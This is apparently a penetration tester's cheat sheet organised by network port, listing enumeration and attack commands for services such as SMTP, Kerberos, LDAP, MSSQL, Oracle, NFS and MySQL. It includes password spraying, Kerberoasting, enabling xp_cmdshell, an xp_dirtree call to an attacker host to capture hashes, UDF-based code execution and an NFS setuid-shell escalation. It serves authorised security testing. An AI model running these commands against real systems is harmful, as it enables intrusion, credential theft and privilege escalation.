Ports / Services
21 TCP - FTP
ftp
| Action |
Command |
| Connect to server |
ftp <ip address> |
| Upload file |
put <file> |
| Download file |
get <file> |
| Upload multiple files |
mput * |
| Download multiple files |
mget * |
| Local current directory |
lcd |
| Set binary mode |
binary |
wget
| Action |
Command |
| Recursively download FTP contents |
wget -r ftp://<user><ip address> --password=<password> |
| Mirror FTP |
wget --mirror ftp://<user>:<password>@<ip address> |
proftp
- Can copy a file between remote directories using write permissions
| Action |
Command |
| Connect to FTP server |
telnet <ip address> <port> |
| Select a file to copy |
site cpfr <remote file> |
| Select a location to copy file to |
Site cpto <remote directory to copy file to> |
22 TCP - SSH
- Bruteforce credentials using:
- Hydra
- Crowbar for private keys
- Metasploit ssh_login module
25 TCP - SMTP
- Attack paths
- Enumerate users
VRFY <username>EXPN <list>RCPT TO acceptance testing (after MAIL FROM:<>; compare 250 vs 550)- Timing differences between valid/invalid
RCPT TO
- Re-test after
STARTTLS (behavior may change)
- Open relay / mis-scoped relay (test on ports 25/587/465)
- Spoofing exposure due to weak SPF/DKIM/DMARC
- SMTP AUTH spray/brute on submission ports (587/465) if
AUTH is advertised
- NTLM relay to SMTP if
AUTH NTLM is enabled
- STARTTLS downgrade risk (opportunistic-only TLS)
SMTP commands
Miscellaneous
| Action |
Command |
| Connect to SMTP server |
telnet <ip> <port>
nc -nvC <ip> <port> |
| Verify an email address |
VRFY <username> |
| List a mailing list’s membership |
EXPN <list> |
| Keepalive / test |
NOOP |
| Reset current transaction |
RSET |
| Help |
HELP |
| Quit |
QUIT |
Send an email
| Step |
Command |
| 1 |
EHLO <client-hostname> (or HELO <client-hostname>) |
| 2 |
STARTTLS (optional; if used, run EHLO again after TLS) |
| 3 |
AUTH LOGIN (Must use EHLO first. Server will ask for username in base64 format and then password in base64 format) |
| 4 |
MAIL FROM:<sender@example.com> |
| 5 |
RCPT TO:<recipient@example.com> (repeat per recipient) |
| 6 |
DATA |
| 7 |
. (type headers + blank line + body, then a single .) |
| 8 |
QUIT (optional) |
Minimal RCPT-based enumeration (no delivery)
EHLO <client-fqdn> - do not include angle brackets
MAIL FROM:<> - keep the angle brackets, purposely empty.
RCPT TO:<user@domain> - keep the angle brackets
EHLO can be an IP-literal if needed (e.g., EHLO [192.0.2.10]); if refused, use HELO.
- If you use STARTTLS, run EHLO again post-TLS.
- Responses: 250 = valid user, 550 = no such user.
53 TCP - DNS
nslookup
| Action |
Command |
| Interactive shell |
nslookup |
| Query A (default resolver) |
nslookup <name> |
| Query via specific server |
nslookup <name> <server> |
| MX records |
nslookup -type=mx <domain> |
| NS records |
nslookup -type=ns <domain> |
| SOA record |
nslookup -type=soa <domain> |
| TXT record |
nslookup -type=txt <name> |
| Reverse (PTR) |
nslookup <ip> |
| Zone transfer attempt |
nslookup -type=AXFR <domain> <server> |
host
| Action |
Command |
| Query A |
host <name> |
| Reverse (PTR) |
host <ip> |
| MX records |
host -t mx <domain> |
| NS records |
host -t ns <domain> |
| SOA record |
host -t soa <domain> |
| TXT record |
host -t txt <name> |
| Zone transfer (AXFR) |
host -l <domain> <server> |
dig
| Action |
Command |
| A via specific server |
dig @<server> <name> A +short |
| Reverse (PTR) |
dig -x <ip> +short |
| MX records |
dig @<server> <domain> MX +short |
| NS records |
dig @<server> <domain> NS +short |
| SOA record |
dig @<server> <domain> SOA +short |
| TXT record |
dig @<server> <name> TXT +short |
| Zone transfer (AXFR) |
dig @<server> <domain> AXFR +tcp |
| Trace delegation path |
dig +trace <name> |
| CHAOS version.bind |
dig @<server> -c CH -t TXT version.bind +short |
DNSRecon
| Action |
Command |
| Standard records |
dnsrecon -d <domain> |
| Standard against specific NS |
dnsrecon -d <domain> -n <server> -t std |
| Zone transfer attempt |
dnsrecon -d <domain> -t axfr -n <server> |
| Subdomain brute force |
dnsrecon -d <domain> -D <wordlist> -t brt |
| Reverse sweep |
dnsrecon -r <cidr> -n <server> |
69 UDP - TFTP
79 TCP - Finger
$ nc -nv 192.168.108.140 79 130 ⨯
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.108.140:79.
charlotte
Login: charlotte Name: Charlotte
[No profile information]
80 TCP - HTTP
- Cleartext / unencrypted web service
88 TCP - Kerberos
Attack paths
- Username enumeration with kerbrute
kerbrute userenum -d <domain> <userlist>
- AS-REP Roasting (no pre-auth)
impacket-GetNPUsers -dc-ip <dc_ip> <domain>/ -no-pass -usersfile <users.txt> -outputfile <hashes.txt>
- Kerberoasting (retrieve all roastable users + hashes)
impacket-GetUserSPNs -dc-ip <dc_ip> <domain>/<user>:'<pass>' -request -outputfile <hashes.txt>
110 TCP - POP3
- Post Office Protocol
- Receives emails.
Commands
| Action |
Command |
| Connect to server |
nc -nv <ip address> <port>
nc -nvC <ip address> <port> |
| Pick username to login with |
USER <username> |
| Enter password |
PASS <password> |
| List emails |
LIST |
| Read email |
RETR <email # from list> |
111 TCP – rpcbind / NFS
- RPC portmapper. Maps RPC program numbers to the TCP/UDP ports those services use (e.g., NFS, mountd, nlockmgr, statd, rquotad). If 111 is open, check for NFS (2049) and related RPC services. Note: NFSv3 typically uses rpcbind; NFSv4 can run on 2049 alone.
What to look for (findings)
- World-readable/writable exports (e.g.,
*(rw) or wide subnets).
no_root_squash (client root = server root on export).- Sensitive paths exported (home dirs, backups, app secrets).
- UID/GID-based access: to read as a specific UID on a mounted share, run commands as that UID (e.g.,
sudo -u '#1001' ls /mnt/nfs/...).
- Kerberized NFS required? (e.g.,
sec=krb5*) — you won’t mount without proper creds.
nmap
nmap -sV -sU -p111,2049 --script "rpcinfo,nfs-*" <ip>
rpcinfo
| Action |
Command |
| List registered RPC programs and ports |
rpcinfo -p <ip> |
| Summary by transport (tcp/udp) |
rpcinfo -s <ip> |
| Query a specific program/version/transport |
rpcinfo -T tcp -u <ip> <prog> <vers> |
showmount
| Action |
Command |
| List exports |
showmount -e <ip> |
| List clients using exports |
showmount -a <ip> |
mount / umount
| Action |
Command |
| Mount NFSv3 export |
sudo mount -t nfs -o ro,vers=3 <ip>:/<export> /mnt/nfs |
| Mount NFSv4 root |
sudo mount -t nfs4 -o ro <ip>:/ /mnt/nfs |
| Unmount |
sudo umount /mnt/nfs |
113 TCP – ident
- Legacy Identification Protocol (RFC 1413): maps a TCP connection to the local username on the target. Often disabled/firewalled; useless behind NAT.
nmap
| Action |
Command |
| Identify ident service |
nmap -p113 -sV <host> |
| Enumerate owners of listening services via ident |
nmap -p113 --script=auth-owners <host> |
| Try ident against all open TCP ports (slower) |
nmap -sT --script=auth-owners -p- <host> |
- Manual probe (requires a live TCP connection to the target port): connect to some service on the host, then to port 113 and send
<server-port> , <your-src-port>.
119 TCP - NNTP
- Network News Transfer Protocol
Commands
| Action |
Command |
| Connect to server |
nc -nv <ip> <port> |
| List available articles to read |
LIST
LIST
215 list of newsgroups follows
org.apache.avalon.dev 0 0 y
org.apache.avalon.user 0 0 y
The 0 in each column means the first and last article for each newgroup is 0. This means there are no article available to read. |
135 TCP - MSRPC
impacket-rpcdump
- Query the Endpoint Mapper to list RPC endpoints, interfaces (UUIDs), and their dynamic ports.
| Action |
Command |
| Enumerate RPC endpoints (unauth) |
impacket-rpcdump <target> |
| Enumerate with credentials |
impacket-rpcdump <domain>/<user>:<pass>@<target> |
impacket-rpcmap
- Query the RPC management interface to list bound DCE/RPC interfaces on a given transport/port.
| Action |
Command |
| List interfaces via EPM on TCP/135 |
impacket-rpcmap 'ncacn_ip_tcp:<ip>' |
| List interfaces on a specific RPC port |
impacket-rpcmap 'ncacn_ip_tcp:<ip>[1025]' |
| List via SMB named pipe (EPM) |
impacket-rpcmap 'ncacn_np:<ip>[\\pipe\\epmapper]' |
Nmap – msrpc-enum (NSE)
- Nmap script that queries the MS-RPC endpoint mapper and summarizes mapped services.
| Action |
Command |
| Enumerate mapped RPC services |
nmap -p135 --script msrpc-enum <target> |
| Same, with SMB auth (if supported) |
nmap -p135 --script msrpc-enum --script-args smbusername=<user>,smbpassword=<pass> <target> |
137/UDP – NetBIOS Name Service (NBNS)
- Legacy name resolution and Node Status.
- Works only if NetBIOS over TCP/IP is enabled and UDP/137 is reachable.
nbtscan
| Action |
Command |
| Enumerate NetBIOS names |
sudo nbtscan -r <cidr> |
139/TCP – NetBIOS Session Service
- Legacy transport for SMB1 (NT1).
- Modern SMB (SMB2/3) uses 445 and does not require NetBIOS.
- Enumeration on 139 works only if SMB1 is enabled on the target.
- Only useful if 445 is unavailable or the host is SMB1-only.
- Test SMB1 on 139:
smbclient -L <ip> -p 139 -m NT1
- Null session via RPC:
rpcclient -U '' -N -p 139 <ip>
- See SMB & RPC Enumeration
143 TCP - IMAP
Commands
| Action |
Command |
| Connect to service (cleartext) |
nc -nv <ip> 143 |
| Connect to service (TLS) |
openssl s_client -crlf -quiet -starttls imap -connect <host>:143 |
| Login |
LOGIN <username> <password> |
| Login (quoted values) |
LOGIN "<username>" "<password>" |
| List all folders/mailboxes |
A1 LIST * |
| List INBOX children |
A1 LIST INBOX * |
| List “Archive” children |
A1 LIST "Archive" * |
| Create folder/mailbox |
A1 CREATE "<name>" |
| Delete folder/mailbox |
A1 DELETE <name> |
| Rename folder/mailbox |
A1 RENAME <old> <new> |
| List subscribed folders |
A1 LSUB "" * |
| Mailbox status |
A1 STATUS INBOX (MESSAGES UNSEEN RECENT) |
| Select mailbox |
A1 SELECT INBOX |
| List messages (flags) |
A1 FETCH 1:* (FLAGS) |
| List messages by UID (flags) |
A1 UID FETCH 1:* (FLAGS) |
| Retrieve message body (text) |
A1 FETCH 2 BODY[TEXT] |
| Retrieve message (all) |
A1 FETCH 2 ALL |
| Retrieve by UID (peek) |
A1 UID FETCH 102 (UID RFC822.SIZE BODY.PEEK[]) |
| Close mailbox |
A1 CLOSE |
| Logout |
A1 LOGOUT |
161 UDP - SNMP
- SNMP: protocol for managing/monitoring network devices (typically UDP/161 for queries, UDP/162 for traps).
- MIB (Management Information Base): hierarchical definitions (OIDs) of manageable data; devices expose values for those objects.
- Security: SNMPv1/v2c send community strings and data in cleartext (no auth/integrity/encryption) → sniffing, spoofing, replay possible; ACLs based on source IP can be bypassed with spoofing. SNMPv3 provides authentication and encryption (auth/priv) and timeliness checks.
- Defaults: “public” (RO) and “private” (RW) community strings are historically common and still encountered on misconfigured gear
MIB Objects / OIDs:
| MIB Object |
OID |
| TCP Local Ports |
1.3.6.1.2.1.6.13.1.3 |
| User Accounts |
1.3.6.1.4.1.77.1.2.25 |
| Software Name |
1.3.6.1.2.1.25.6.3.1.2 |
| Storage Units |
1.3.6.1.2.1.25.2.3.1.4 |
| Processes Path |
1.3.6.1.2.1.25.4.2.1.4 |
| Running Programs |
1.3.6.1.2.1.25.4.2.1.2 |
| System Processes |
1.3.6.1.2.1.25.1.6.0 |
onesixtyone
- SNMP scanner / community string brute force
| Action |
Command |
| Scan with community wordlist |
onesixtyone -c <communities.txt> <cidr-or-host> |
| Scan host list |
onesixtyone -c <communities.txt> -i <hosts.txt> |
snmpwalk
- Probe and query SNMP values
snmpget
| Action |
Command |
| Read single OID (v2c) |
snmpget -v2c -c <community> <ip> <OID> |
| Action |
Command |
| Walk entire tree (v1) |
snmpwalk -v1 -c <community> <ip> . |
| Walk entire tree (v2c) |
snmpwalk -v2c -c <community> <ip> . |
| Walk specific OID (v2c) |
snmpwalk -v2c -c <community> <ip> <OID> |
| Walk (v3, authPriv) |
snmpwalk -v3 -l authPriv -u <user> -a SHA -A <authpass> -x AES -X <privpass> <ip> . |
snmpbulkwalk
| Action |
Command |
| Bulk walk (v2c) |
snmpbulkwalk -v2c -c <community> <ip> . |
| Bulk walk (v3, authPriv) |
snmpbulkwalk -v3 -l authPriv -u <user> -a SHA -A <authpass> -x AES -X <privpass> <ip> . |
389 TCP - LDAP
- Plaintext LDAP service
- Retrieve global catalog information from a Domain Controller (DC).
ldapsearch
| Action |
Command |
| Basic search (anonymous) |
ldapsearch -H ldap://<ip> -x |
| Authenticate as user (simple bind) |
ldapsearch -H ldap://<ip> -x -D '<user>@<domain>' -w '<password>' -b 'DC=<x>,DC=<y>' |
| Retrieve naming contexts |
ldapsearch -H ldap://<ip> -x -s base -b '' namingcontexts |
| Dump a naming context |
ldapsearch -H ldap://<ip> -x -b 'DC=<x>,DC=<y>' '(objectClass=*)' |
| Query with filter (template) |
ldapsearch -H ldap://<ip> -x -b 'DC=<x>,DC=<y>' '<LDAP filter>' |
| All people (common attrs) |
ldapsearch -H ldap://<ip> -x -b 'DC=<x>,DC=<y>' '(objectClass=person)' sAMAccountName memberOf |
| Single user by sAMAccountName |
ldapsearch -H ldap://<ip> -x -b 'DC=<x>,DC=<y>' '(&(objectClass=user)(sAMAccountName=<user>))' sAMAccountName memberOf pwdLastSet |
| Domain Admins members |
ldapsearch -H ldap://<ip> -x -b 'DC=htb,DC=local' '(&(objectClass=user)(memberOf=CN=Domain Admins,CN=Users,DC=htb,DC=local))' sAMAccountName |
| (Alt) Direct LDAPS |
ldapsearch -H ldaps://<ip> -x -D '<user>@<domain>' -w '<password>' -b 'DC=<x>,DC=<y>' |
| Search for interesting information |
awk '{print $1}' <ldap_dump.ldif | sort | uniq -c | sort -nr |
- If
ldap_bind: Strong(er) authentication required (8)
| Action |
Command |
| Fetch server certificate |
echo -n | openssl s_client -connect <dc_fqdn>:636 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > ldapserver.pem |
| Trust cert for ldap-tools |
echo 'TLS_CACERT <path>/ldapserver.pem' | sudo tee -a /etc/ldap/ldap.conf |
| Re-run with STARTTLS |
ldapsearch -H ldap://<ip> -x -Z -D '<user>@<domain>' -w '<password>' -b 'DC=<x>,DC=<y>' |
nxc
- Fast AD LDAP enumeration (users/groups/computers, policy, roastable accounts). Target a DC for best results.
| Action |
Command |
| Anonymous bind check (user enum) |
nxc ldap <dc_ip> -u '' -p '' --users |
| Enumerate users |
nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --users |
| Enumerate groups |
nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --groups |
| Enumerate computers |
nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --computers |
| Password policy |
nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --password-policy |
| List SPNs |
nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --spns |
| Kerberoast (dump hashes) |
nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --kerberoast > kerberoast.txt |
| AS-REP roast (no-preauth users) |
nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --asreproast > asrep.txt |
Notes: Works against Windows DCs and Samba AD DCs; may work against domain-joined members but is policy-dependent. Use valid creds; anonymous often fails in modern domains.
443 TCP - HTTPS
sslscan
- Quick cipher/protocol/certificate survey.
| Action |
Command |
| Quick scan |
sslscan <host>:443 |
| Show only accepted suites |
sslscan --no-failed <host>:443 |
| Save XML report |
sslscan --xml=sslscan.xml <host>:443 |
testssl.sh
- Deeper checks (protocols, ciphers, vulns), good for internal hosts.
| Action |
Command |
| Quick scan |
testssl <host>:443 |
| Faster overview |
testssl --fast <host>:443 |
| Save JSON report |
testssl --jsonfile out.json <host>:443 |
SSL Labs
- External grading (internet-reachable hosts only). Use web UI or CLI.
| Action |
Command |
| Check using website |
https://www.ssllabs.com/ssltest/analyze.html?d=<host> |
| Check using CLI tool |
ssllabs-scan --usecache --quiet <host> |
445 TCP – SMB
Enumerate Samba Version
| Method |
Steps |
| Wireshark |
Log in anonymously: smbclient -L \\<ip address>
Search for packet with "Session Setup Andx Responses" in the Info field. |
| ngrep & smbclient |
Terminal 1: ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]' port 139
Terminal 2: echo exit | smbclient -L <ip address> |
464 TCP & UDP - kpasswd5
- Kerberos v5 password change/reset service on AD domain controllers (TCP/UDP 464). Implements RFC 3244 “Change/Set Password” via the
kadmin/changepw service, allowing users to change their own (including expired) passwords and admins to reset others, with domain policy enforcement. Typically invoked by kpasswd or automatically during kinit when a change is required.
500 UDP – ISAKMP / IKE
- IKE (Internet Key Exchange) negotiates IPsec Security Associations (SAs) and keys within the ISAKMP framework on UDP 500 (and UDP 4500 for NAT-Traversal).
- IPsec data planes:
- AH (integrity, origin, anti-replay)
- ESP (adds confidentiality).
- Modes:
- Transport (encrypts payload)
- Tunnel (encapsulates whole IP packet).
- Versions:
- IKEv1 (Main/Aggressive)
- IKEv2 (simplified handshake, better NAT/mobility).
- Auth typically via PSK or certificates.
ike-scan
| Action |
Command |
| Probe IKE (v1, Main Mode) |
ike-scan -M <ip> |
| Probe IKE (v1, Aggressive Mode) |
ike-scan -A <ip> |
| Probe IKEv2 |
ike-scan --ikev2 <ip> |
| Show transforms/auth methods (verbose) |
ike-scan -M -v <ip> |
| Capture Aggressive Mode for PSK cracking / Check for PSK with Aggressive mode |
ike-scan -A [--sport=<port>] --pskcrack=ike.txt <ip> |
| Crack PSK offline (dictionary) |
psk-crack --dictionary <wordlist> ike.txt |
- Some Aggressive-Mode implementations (notably Cisco ASA) return a fake hash when an invalid id is used.
Comprehensive Aggressive mode with PSK checkike-scan -A --sport=5500 --idtype=3 --id administrator@example.com --pskcrack=ike_psk_t3.txt <ip>
ike-scan -A --sport=5500 --idtype=11 --id example --pskcrack=ike_psk_t11.txt <ip>
ike-scan -A --sport=5500 --idtype=1 --id <ip> --pskcrack=ike_psk_t1.txt <ip>
ike-scan -A --sport=5500 --idtype=2 --id example.com --pskcrack=ike_psk_t2.txt <ip>
--sport=5500 is optional. Only use if 500 is already in-use on your local system.
636 TCP - LDAPS
873 TCP - rsync
Commands
| Action |
Command |
| Enumerate shares (daemon) |
rsync <ip>:: |
| Enumerate shares (alt URL) |
rsync rsync://<ip>/ |
| List files in a share |
rsync <ip>::<share> |
| Download remote file (daemon) |
rsync rsync://<ip>/<share>/<remote_file> <local_dir>/ |
| Download remote directory (daemon) |
rsync -av rsync://<ip>/<share>/<remote_dir>/ <local_dir>/ |
| Download with custom port/user (daemon) |
rsync -av rsync://<user>@<ip>:<port>/<share>/ <local_dir>/ |
| Upload local file (daemon) |
rsync <local_file> rsync://<user>@<ip>/<share>/<remote_dir>/ |
| Upload local directory (daemon) |
rsync -av <local_dir>/ rsync://<user>@<ip>/<share>/<remote_dir>/ |
| Upload local .ssh directory (example) |
rsync -av ./.ssh/ rsync://<ip>/<share>/ |
| Over SSH on non-22 port |
rsync -a -e "ssh -p <port>" <local_dir>/ <user>@<ip>:<remote_dir>/ |
1433 TCP – Microsoft SQL
- Microsoft SQL Server default service (SQL and Windows authentication). Good resource: http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
Commands
| Action |
Command |
| Run shell command |
EXEC xp_cmdshell '<command>'; |
| Enable xp_cmdshell |
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE; |
| View databases |
SELECT name FROM master.dbo.sysdatabases; |
| Select/use a database |
USE <db>; |
| Get table names |
SELECT * FROM <db>.INFORMATION_SCHEMA.TABLES;
SELECT name FROM sysobjects WHERE xtype = 'U'; |
| List linked servers |
EXEC sp_linkedservers;
SELECT * FROM sys.servers; |
| List users |
SELECT sp.name AS login, sp.type_desc AS login_type, sl.password_hash, sp.create_date, sp.modify_date, CASE WHEN sp.is_disabled = 1 THEN 'Disabled' ELSE 'Enabled' END AS status FROM sys.server_principals sp LEFT JOIN sys.sql_logins sl ON sp.principal_id = sl.principal_id WHERE sp.type NOT IN ('G','R') ORDER BY sp.name; |
| Create user with sysadmin privs |
CREATE LOGIN <username> WITH PASSWORD = '<password>';
EXEC sp_addsrvrolemember '<username>', 'sysadmin'; |
| View password hashes |
SELECT name, password_hash FROM master.sys.sql_logins; |
| View permissions |
SELECT * FROM fn_my_permissions(NULL, 'SERVER'); |
nxc
| Action |
Command |
| Spray passwords (SQL auth) |
nxc mssql <target_or_cidr> -u <user_or_list> -p <pass_or_list> |
| Windows auth login |
nxc mssql <ip> -d <domain> -u <user> -p '<pass>' |
| Windows auth with NTLM hash |
nxc mssql <ip> -d <domain> -u <user> -H <NTHASH> |
| Run OS command via xp_cmdshell |
nxc mssql <ip> -u <user> -p '<pass>' -x "whoami" |
| Run an ad-hoc SQL query |
nxc mssql <ip> -u <user> -p '<pass>' -q "SELECT @@version" |
| Check if xp_cmdshell is enabled |
nxc mssql <ip> -u <user> -p '<pass>' -q "SELECT CAST(value_in_use AS INT) FROM sys.configurations WHERE name='xp_cmdshell'" |
| Enable xp_cmdshell |
nxc mssql <ip> -u <user> -p '<pass>' -q "EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;" |
| Trigger SMB auth (capture NetNTLMv2) |
nxc mssql <ip> -u <user> -p '<pass>' -q "EXEC master..xp_dirtree '\\\\<attacker_ip>\\<share>'" |
| Specify non-default port |
nxc mssql <ip> --port <port> -u <user> -p '<pass>' |
impacket-mssqlclient
| Action |
Command |
| Login (SQL auth) |
mssqlclient <user>:<password>@<ip> |
| Login (Windows auth) |
mssqlclient <domain>/<user>:<password>@<ip> -windows-auth |
| Enable xp_cmdshell (helper) |
enable_xp_cmdshell |
| Run shell command (helper) |
xp_cmdshell <command> |
| Enable xp_cmdshell (T-SQL one-liner) |
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; |
| Run shell command (T-SQL) |
EXEC xp_cmdshell '<command>'; |
Attack Path
- Capture sql service account SMB authentication
- Start responder on tun0
- Authenticate to responder and capture net ntlm hash
EXEC master.dbo.xp_dirtree '\\<attacker_ip>\\<share>';
- Crack captured NetNTLMv2 hash
hashcat -m 5600 <hash_file> <wordlist>
1521 TCP – Oracle TNS Listener
- Oracle Transparent Network Substrate (TNS) listener for Oracle Database. Handles client connection negotiation and service/SID routing; common target for SID discovery and auth brute force.
Commands
| Action |
Command |
| View privileges |
SELECT * FROM session_privs;
SELECT * FROM user_role_privs; |
| Read file (UTL_FILE) |
See snippet below |
| Write file (UTL_FILE) |
See snippet below |
| Run last PL/SQL block |
/ |
| Enable output |
SET SERVEROUTPUT ON |
Read a File
declare
f utl_file.file_type;
s varchar(400);
begin
f := utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm', 'R');
utl_file.get_line(f,s);
utl_file.fclose(f);
dbms_output.put_line(s);
end;
Write a File
declare
f utl_file.file_type;
s varchar(5000) := '<insert text to write>';
begin
f := utl_file.fopen('/inetpub/wwwroot', '<file to write>', 'W');
utl_file.put_line(f,s);
utl_file.fclose(f);
end;
- Requires
sqlplus installed and reachable in $PATH.
| Action |
Command |
| Enumerate SIDs |
odat sidguess -s <ip> -p <port> |
| Brute-force credentials |
odat passwordguesser -s <ip> -d <service> -U <user_or_list> -P <pass_or_list> |
| All-in-one checks (authenticated) |
odat all -s <ip> -d <service> -U <user> -P <pass> |
| Authenticate as SYSDBA (flag) |
--sysdba |
| Upload file via DBMS_ADVISOR |
odat dbmsadvisor -s <ip> -d <service> -U <user> -P <pass> --sysdba --putFile C:\\inetpub\\wwwroot <remote_file> <local_file> |
| Upload file via DBMS_XSLPROCESSOR |
odat dbmsxslprocessor -s <ip> -d <service> -U <user> -P <pass> --sysdba --putFile C:\\inetpub\\wwwroot <remote_file> <local_file> |
| Action |
Command |
| SID brute |
msfconsole -q -x "use auxiliary/scanner/oracle/sid_brute; set RHOSTS <ip>; set RPORT 1521; run; exit" |
| Login brute |
msfconsole -q -x "use auxiliary/scanner/oracle/oracle_login; set RHOSTS <ip>; set RPORT 1521; set SID <sid>; run; exit" |
sqlplus
| Action |
Command |
| Login |
sqlplus64 <user>/<password>@<ip>:<port>/<service> |
| Login as SYSDBA |
sqlplus64 <user>/<password>@<ip>:<port>/<service> as sysdba |
Resources:
- Oracle DB exploit guide - blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf
- Metasploit for Oracle - blog.zsec.uk/msforacle/
1801 TCP - MSMQ
Can contain a QueueJumper vulnerability which allows for RCE. Exploitation may result in DoS causing issues with email.
2049 TCP / mountd (NFS)
- NFS server daemon (
nfsd) for Unix/Linux file sharing. NFSv4 typically uses only 2049; NFSv3 also relies on additional RPC services (e.g., mountd, lock/quotas) discovered via rpcbind on 111.
| Action |
Command |
| Show the NFS server’s export list |
showmount -e <target> |
| Show NFS shares with nmap |
nmap –sV –script=nfs-showmount <target> |
| Mount an NFS share |
mount -o rw,vers=2 <target>:<share> <local_directory> |
- NFS share information is stored in /etc/exports
Root Squashing
When connecting to an NFS share, if root squashing is enabled, then the owner of the files in the share will be set to "nobody".
1. On victim machine
Check /etc/exports to see if no_root_squash is listed. If so, root squashing is disabled.
2. On attack machine
Show NFS share availabilityshowmount -e <target ip>
Confirm NFS share is available for remote mounting
mkdir /tmp/nfs
mount -o rw,vers=2 <target>:<share> /tmp/nfs
sudo msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs /tmp/nfs/shell.elf
3. On victim machine
Execute payload/tmp/shell.elf
showmount
| Action |
Command |
| Show exported paths |
showmount -e <ip> |
| Show clients using exports |
showmount -a <ip> |
mount
| Action |
Command |
| Create local mount point |
sudo mkdir -p /mnt/<dir> |
| Mount NFSv3 export |
sudo mount -t nfs <ip>:<export> /mnt/<dir> |
| Mount NFSv4 export |
sudo mount -t nfs4 <ip>:/<export> /mnt/<dir> |
| Unmount (forced/lazy) |
sudo umount -lf /mnt/<dir> |
nmap (NFS)
| Action |
Command |
| Enumerate exports via NSE |
nmap -p 111,2049 --script nfs-showmount <ip> |
| List files on export |
nmap -p 2049 --script nfs-ls --script-args nfs-ls.root=/,nfs.version=3 <ip> |
| Get filesystem stats |
nmap -p 2049 --script nfs-statfs <ip> |
3000 TCP – Express.js / Node (HTTP)
- Common development HTTP port for Node.js apps (Express, Next.js, React dev server).
- 9229 TCP – Node.js Inspector (remote debugging)
3268 TCP - LDAP
- LDAP (Global Catalog): forest-wide, read-only search endpoint on GC servers; returns only attributes in the Partial Attribute Set. Use 389/636 on a domain DC for full attributes or modifications. LDAPS to GC: 3269/TCP.
3269 TCP - LDAPS
- orest-wide LDAP over SSL/TLS to GC servers. Supports searches without referrals but returns only attributes in the Partial Attribute Set. For full attributes or modifications, query a domain DC on 636 (LDAPS) or 389 (LDAP).
3306 TCP – MySQL
- MySQL server default TCP port (SQL protocol over TCP).
Attack Paths
RCE via UDF upload
- RCE via UDF upload: Place a malicious shared library in
plugin_dir and CREATE FUNCTION ... SONAME ...; invoking the UDF can execute OS commands.
- Requirements: Ability to write to
plugin_dir (directly or via SELECT ... INTO DUMPFILE) and privilege to create UDFs (CREATE FUNCTION).
- Notes: Library must match server OS/architecture;
secure_file_priv may restrict file writes; UDFs persist until DROP FUNCTION.
- Mitigations: Lock down
plugin_dir, restrict CREATE FUNCTION, set secure_file_priv, avoid running mysqld as root.
| Action |
Command |
| Show plugin directory |
SHOW VARIABLES LIKE 'plugin_dir'; |
| Verify privileges |
SHOW GRANTS; |
| List installed UDFs (legacy) |
SELECT * FROM mysql.func; |
| Create UDF from library |
CREATE FUNCTION <udf_name> RETURNS INTEGER SONAME '<library.so|dll>'; |
| Use UDF (example) |
SELECT <udf_name>('<arg>'); |
| Drop UDF |
DROP FUNCTION <udf_name>; |
Commands
| Action |
Command |
| Show variables |
SHOW VARIABLES; |
| Show user privileges |
SHOW GRANTS; |
| Show individual variable |
SELECT @@<variable>; |
| Show plugins directory |
SHOW VARIABLES LIKE '%plugin_dir%'; |
| Show databases |
SHOW DATABASES; |
| Select/use a database |
USE <database>; |
| Show server version |
SELECT @@version; |
| Show current user |
SELECT USER(); |
| List tables in a DB |
SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='<db>'; |
| List columns for a table |
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='TableName'; |
| Select username and password columns |
SELECT username, password FROM TableName; |
| Show all columns/records in users |
SELECT * FROM users; |
| Show username where id=1 |
SELECT username FROM users WHERE id=1; |
| Load data from local file into table |
LOAD DATA LOCAL INFILE '/path/file.csv' INTO TABLE <table> FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n'; |
| Change cell contents |
UPDATE <Table> SET <Column>='<Value>' WHERE <Column>='<Value>'; |
| Create database |
CREATE DATABASE <name>; |
| Insert row into table |
INSERT INTO <table>(<col1>,<col2>) VALUES ('<val1>','<val2>'); |
| Create user |
CREATE USER '<username>'@'<host>' IDENTIFIED BY '<password>'; |
| Grant all permissions to user |
GRANT ALL ON <database>.* TO '<user>'@'<host>'; |
| Limit results |
SELECT * FROM <table> LIMIT <number>; |
| Set binary variable |
SET @<var> = 0x<hex>; |
| Output variable to server file |
SELECT @<var> INTO DUMPFILE '/path/something.bin'; |
| Info about tables/databases |
SELECT * FROM INFORMATION_SCHEMA.TABLES; |
| Check column collation |
SELECT COLLATION_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='<table>' AND COLUMN_NAME='<column>'; |
| Select with explicit collation |
SELECT <column> COLLATE <collation> FROM <table>; |
mysql
| Action |
Command |
| Connect (TCP) |
mysql --host=<ip> --port=3306 --user=<user> -p<password> |
| Connect and run one query |
mysql -h <ip> -P 3306 -u <user> -p<password> -e "SELECT VERSION();" |
| List databases |
mysql -h <ip> -P 3306 -u <user> -p<password> -e "SHOW DATABASES;" |
| List tables in a DB |
mysql -h <ip> -P 3306 -u <user> -p<password> -e "USE <db>; SHOW TABLES;" |
| Current user |
